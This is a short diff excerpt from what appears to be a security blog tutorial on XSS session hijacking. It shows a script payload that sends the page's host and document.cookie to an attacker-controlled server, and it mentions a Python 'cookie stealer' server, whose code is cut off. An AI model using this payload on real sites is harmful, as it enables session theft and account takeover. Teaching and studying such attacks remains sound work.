s0lst1c3/s0lst1c3.github.io/_posts/2016-04-19-xss-session-hijacking-i.md

 <script> var xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", "http://192.168.1.191/update", true); xmlhttp.send(JSON.stringify({hostname: window.location.host, session:document.cookie})); </script>
 {% endhighlight %}

-The Python script that acts as our cookie stealer's server is similar to the ones we created before.
+The Python script that acts as our cookie stealer's server is smilar to the ones we created before.
 Its distinctive characteristics are that it accepts 'POST' requests and grabs the cookies from the JSON POST data as opposed to the query string.

 {% highlight python %}